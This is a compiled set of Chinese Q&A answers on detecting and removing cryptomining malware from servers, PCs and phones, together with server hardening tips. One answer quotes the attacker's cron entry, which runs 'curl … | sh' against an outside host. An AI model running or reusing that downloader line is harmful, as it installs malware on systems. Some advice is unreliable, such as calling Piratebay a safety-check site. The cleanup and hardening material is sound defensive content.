進程被挖礦怎麼辦

❶ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

❷ 電腦被svchost.exe挖礦怎麼辦

這個svchost.exe是系統程序，所有的系統服務都有依靠它來運行的，根本就不能刪掉的（即使刪了你的系統也就崩潰了），所以需要你檢查控制面板，管理工具，服務，看看服務中有什麼可疑的內容沒有。

❸ 如何清理手機挖礦程序

手機徹底恢復成出場模式，清理掉所有安裝消耗手機性能的東西。

❹ 手機被挖礦怎麼辦

可以使用設備訪問檢測網站（例如 Piratebay）來確認其安全性。

雖然 Chrome 是最常用的瀏覽器，但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告，此外，它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本，這與網頁上的廣告攔截技術並沒有太大區別。

相關信息：

「偷礦」是指未經你同意的情況下，黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 Java 代碼，黑客在代碼中注入「偷礦」程序，當你訪問這些代碼時，「偷礦」程序便會偷偷自動運行。

雖然黑客能夠主動入侵網站來運行挖礦腳本，但需要注意的是，那些使用了類似 Coinhive.com 這種插件服務的網站無意中也會給黑客提供更多的可乘之機。

❺ 電腦中了挖礦病毒 怎麼辦阿 著急 新手小白

ctrl+alt+delete打開任務管理器試一下是否有異常進程暫用cpu

另外可以下載安裝360安全衛士開啟反挖礦防護，有效攔截，並且使用木馬查殺進行全盤查殺

❻ 電腦被挖礦了怎麼恢復！求助！（已經卸載並且將其殺毒）

重裝一遍系統，就完全恢復了

任何挖坑都需要安裝軟體的，重裝系統，這些軟體都消失了
本質上挖坑，其實就是運行某個軟體，如果不是本人安裝，都是通過木馬安裝的

❼ 電腦被挖礦了怎麼解決

用殺毒軟體在安全模式解決 想徹底解決還是用Pe重裝系統清除挖礦

❽ 電腦被控制挖礦怎麼解決

換電腦（手動滑稽）
殺毒，殺不掉就查cpu或gpu佔用高的程序手動刪除，還不行就換硬碟（挖礦程序所在盤）還不行……換電腦吧

❾ 顯卡bios被共享挖礦了咋辦

殺毒軟體或者是重裝一下系統
投資者如果不知道電腦被別人挖礦怎麼解決，可以首先打開任務管理器，這個時候看到內存應該是專用內存集指的就是某個進程當中的內存，事實上還會有一個共享內存集裡面放著的便是關於共享的東西，主要就是看一下代碼，如果說出現了問題，就可能是病毒用什麼方式直接占據或者是隱藏的內存，這個時候可以直接更換系統或者是殺毒了。如果投資者不知道如何處理，可以來到OKLink瀏覽器上學習一下專業知識，在OKLink瀏覽器中可以了解主流貨幣的動向及價格，也可學習到一些專業知識。
二.如何查看電腦是否被挖礦1.挖礦主要就是用一些比較好的顯卡，這樣在挖礦的過程中效率可以更高一些，所以投資者在監看時只需要看一下GPU或者是CPU的使用情況，就可以發現回到主頁面之後，可以直接右擊開始按鈕。然後在菜單裡面點擊任務管理器，進入管理器之後，先看一下運行程序當中的CPU使用率有沒有過高。2.了解了電腦被別人挖礦怎麼解決後，投資者一定要了解一下該怎麼看。在任務管理器中可以直接點擊性能這個選項，在進入選項之後可以點擊下面的GPU，一般來說可以有兩個，分別是集成的顯卡和獨立的。在正常情況下多辦顯卡顯示的利用率都比較低，除了一些大型的游戲軟體，才可以把獨立的顯卡給調出來。接著可以看獨立顯卡，一般在默認的情況下這種顯卡根本用不到，在啟動游戲時利用率會特別高，如果這個時候確實很高，那麼投資者的電腦就是正在被挖礦中

❿ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.